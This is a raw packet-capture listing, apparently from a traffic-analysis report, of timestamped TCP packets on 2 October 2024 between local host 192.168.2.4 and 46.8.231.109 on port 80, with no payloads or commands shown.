Oct 2, 2024 09:41:22.142009974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142064095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142097950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142148972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142184019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142215967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142249107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142255068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142255068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142255068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142255068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142255068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142282963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142317057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142349005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142383099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142416954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142424107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142424107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142424107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142424107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142424107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142451048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142483950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142517090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142549038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142587900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142589092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142589092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142589092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142589092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142589092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142621994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142657042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142688990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142723083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142755985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142764091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142764091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142764091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142764091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142764091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142791986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142826080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142858982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142891884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142925978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142931938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142931938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142931938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142931938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142931938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.142957926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.142992020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143021107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143055916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143090010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143122911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143130064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143130064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143130064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143130064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143130064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143157005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143191099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143224955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143256903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143290997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143296957 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143296957 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143296957 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143296957 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143296957 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143325090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143359900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143414021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143414021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143414021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143414021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143450975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143491030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.143764019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143764019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.143764019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.214140892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.214165926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.214176893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.214188099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.214196920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.214205980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.214217901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.215375900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.215375900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.221050024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221106052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221138954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221565962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221637964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221673012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221709013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221741915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221777916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221784115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.221784115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.221784115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.221784115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.221784115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.221812963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221847057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221883059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221915960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221949100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.221982002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222014904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222047091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222080946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222089052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.222089052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.222090006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.222090006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.222090006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.222119093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222153902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222187042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222220898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.222887039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.222887039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.222887039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.228718042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.228773117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.228806973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.228841066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.228893995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.228928089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.228961945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.228967905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.228967905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.228967905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.228967905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.228967905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.228996038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229049921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229082108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229111910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229111910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229123116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229124069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229136944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229168892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229203939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229250908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229250908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229250908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229255915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229290962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229342937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229379892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229418039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229420900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229420900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229420900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229420900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229453087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229485989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229522943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229557037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229590893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229597092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229597092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229597092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229597092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229597092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229641914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229677916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229710102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229743004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229787111 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229787111 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229787111 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229787111 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.229805946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229841948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229875088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229926109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229959011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.229993105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230026007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230034113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230034113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230034113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230034113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230077982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230113029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230148077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230181932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230215073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230216980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230218887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230218887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230218887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230218887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230248928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230285883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230355024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230390072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230431080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230431080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230431080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230431080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230431080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230443001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230479956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230489016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230515003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230549097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230598927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230633974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230685949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230694056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230694056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230694056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230694056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230694056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230734110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230765104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230799913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230837107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230890036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230890989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230890989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230890989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230890989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230890989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.230925083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230958939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.230993032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231025934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231059074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231076956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231076956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231076956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231076956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231076956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231093884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231131077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231163979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231198072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231230974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231251001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231251955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231251955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231251955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231251955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231264114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231302023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231336117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231369019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231415987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231415987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231415987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231415987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231415987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231434107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231467009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231502056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231534958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231569052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231601954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231612921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231612921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231612921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231612921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231637001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231669903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231704950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231738091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231765032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231765032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231765032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231774092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231807947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231842041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231875896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231898069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231898069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231898069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231899023 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.231910944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231945038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.231977940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.232373953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.232373953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.232373953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.232373953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.588658094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.588730097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.588788033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.588825941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.588864088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.588881016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.588881016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.588881016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.588901043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.588959932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.588993073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589027882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589061975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589076042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589076042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589076042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589076042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589077950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589092970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589132071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589148045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589165926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589200020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589211941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589252949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589288950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589323997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589355946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589390039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589421988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589468956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589468956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589468956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589468956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589469910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589469910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589499950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589533091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589567900 CEST	80	49749	46.8.231.109	192.168.2.4
